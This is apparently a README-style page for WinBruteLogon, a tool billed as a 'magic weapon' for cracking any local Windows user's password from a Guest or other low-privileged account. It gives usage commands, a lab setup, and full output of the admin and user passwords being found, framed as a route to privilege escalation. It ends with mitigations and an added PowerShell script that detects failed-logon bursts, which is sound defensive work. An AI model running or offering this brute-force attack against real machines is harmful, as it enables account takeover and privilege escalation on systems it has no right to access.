Magic weapon - Get any Microsoft Windows user password without any permission.
Project address: https://github.com/DarkCoderSc/win-brute-logon
Targets: Windows XP to latest Windows 10 version (1909)
Usage
Wordlist from a file:
WinBruteLogon.exe -u <username> -w <wordlist_file>
Wordlist from standard input:
type <wordlist_file> | WinBruteLogon.exe -u <username> -
Introduction
This PoC demonstrates what I would call a critical weakness in the Microsoft Windows authentication mechanism rather than a vulnerability.
The biggest problem is the lack of permissions needed to perform such actions.
In fact, from the Guest account (the most restricted account on Microsoft Windows), you can crack the password of any available local user.
Find out which local users exist with the command: net user
This PoC uses multithreading to speed up the process and supports 32-bit and 64-bit.
PoC test scenario (using guest account)
tested on Windows 10
Install and configure a newly updated Windows 10 virtual or physical machine.
In my case the full Windows version is: 1909 (OS Build 18363.778)
Log in as an administrator and create two different accounts: an administrator and a normal user. Both are local users.
/!\ IMPORTANT NOTE: I used the Guest account in the demo, but this PoC is not limited to the Guest account, it works with any account/group (guest user/regular user/admin user etc...)
Create a new admin user
net user darkcodersc /add
net user darkcodersc trousers
net localgroup administrators darkcodersc /add
Create a normal user
net user HackMe /add
net user HackMe ozlq6qwm
Create a new guest account
net user GuestUser /add
net localgroup users GuestUser /delete
net localgroup guests GuestUser /add
Start the attack
Log off from the administrator account or restart the computer and log on to the guest account.
Put the PoC executable anywhere you have access as a guest user.
Usage: WinBruteLogon.exe -v -u <username> -w <wordlist_file>
-v is optional; it enables verbose mode.
By default, the domain name is taken from the %USERDOMAIN% environment variable. You can specify a custom domain name with the -d option.
Crack the first user: (darkcodersc admin)
prompt(guest)>WinBruteLogon.exe -v -u darkcodersc -w 10k-most-common.txt
Wait a few seconds to see the following results:
[ .. ] Load 10k-most-common.txt file in memory...
[DONE] 10002 passwords successfully loaded.
[INFO] 2 cores are available
[ .. ] Create 2 threads...
[INFO] New "TWorker" Thread created with id=2260, handle=364
[INFO] New "TWorker" Thread created with id=3712, handle=532
[DONE] Done.
[ OK ] Password for username=[darkcodersc] and domain=[DESKTOP-0885FP1] found = [trousers]
[ .. ] Finalize and close worker threads...
[INFO] "TWorkers"(id=2260, handle=364) Thread successfully terminated.
[INFO] "TWorkers"(id=3712, handle=532) Thread successfully terminated.
[DONE] Done.
[INFO] Ellapsed Time : 00:00:06
Crack the second user: (HackMe normal user)
prompt(guest)>WinBruteLogon.exe -v -u HackMe -w 10k-most-common.txt
Wait a few seconds to see the following results:
[ .. ] Load 10k-most-common.txt file in memory...
[DONE] 10002 passwords successfully loaded.
[INFO] 2 cores are available
[ .. ] Create 2 threads...
[INFO] New "TWorker" Thread created with id=5748, handle=336
[INFO] New "TWorker" Thread created with id=4948, handle=140
[DONE] Done.
[ OK ] Password for username=[HackMe] and domain=[DESKTOP-0885FP1] found = [ozlq6qwm]
[ .. ] Finalize and close worker threads...
[INFO] "TWorkers"(id=5748, handle=336) Thread successfully terminated.
[INFO] "TWorkers"(id=4948, handle=140) Thread successfully terminated.
[DONE] Done.
[INFO] Ellapsed Time : 00:00:06
If you gain access to a low-privileged user, you can crack the password of a higher-privileged user and elevate your privileges.
Mitigation:
Disable the Guest account (if present).
Use application whitelisting.
Follow the guidelines for creating and keeping passwords strong. Apply this to all users.
Implement an account lockout policy (none is set by default).
Open secpol.msc, go to Account Policies > Account Lockout Policy, and set Account lockout threshold to the desired value (1 to 999).
The value is the number of failed logon attempts allowed before the account is locked.
/!\ The lockout policy does not apply to administrator accounts. At this point, the best protection for the administrator account (if enabled) is a very complex password.
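As an added example (not part of the WinBruteLogon project), the following PowerShell script checks whether a lockout threshold is configured and groups recent failed logon events (Security event ID 4625) by target account, which is the trace a wordlist run like the one above leaves in the log. It assumes an elevated prompt and that failure auditing for logon events is enabled; the window and threshold values are arbitrary choices.

```powershell
# Added example, not the project's own code. Audit the lockout policy and
# surface bursts of failed logons (Security event 4625) per target account.

function Get-LockoutThreshold {
    # "net accounts" prints "Lockout threshold: Never" when no policy is set
    $line = (net accounts) | Where-Object { $_ -match 'Lockout threshold' }
    if ($line -match ':\s*(\S+)') { return $Matches[1] }
    return $null
}

function Find-FailedLogonBursts {
    param(
        [int]$Minutes   = 10,   # observation window (assumed value)
        [int]$Threshold = 20    # failures per account that count as a burst (assumed value)
    )
    $since  = (Get-Date).AddMinutes(-$Minutes)
    $events = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4625; StartTime = $since } `
                           -ErrorAction SilentlyContinue
    $events |
        ForEach-Object {
            # TargetUserName is the account whose password was tried
            ([xml]$_.ToXml()).Event.EventData.Data |
                Where-Object { $_.Name -eq 'TargetUserName' } |
                Select-Object -ExpandProperty '#text'
        } |
        Group-Object |
        Where-Object { $_.Count -ge $Threshold } |
        ForEach-Object {
            [pscustomobject]@{ User = $_.Name; Failures = $_.Count; WindowMinutes = $Minutes }
        }
}

$threshold = Get-LockoutThreshold
if ($threshold -eq 'Never') {
    Write-Warning 'No account lockout threshold is set; wordlist attacks against local users run unthrottled.'
    # Equivalent of secpol.msc > Account Lockout Policy: 5 attempts, 15-minute lockout and reset window
    # net accounts /lockoutthreshold:5 /lockoutduration:15 /lockoutwindow:15
} else {
    Write-Output "Account lockout threshold: $threshold"
}

Find-FailedLogonBursts | Format-Table -AutoSize
```

A burst of 4625 events against several local accounts from one workstation in a few seconds matches the runs shown above; the built-in Administrator account is not locked out by the policy, so its failures should be alerted on rather than relied on to self-limit.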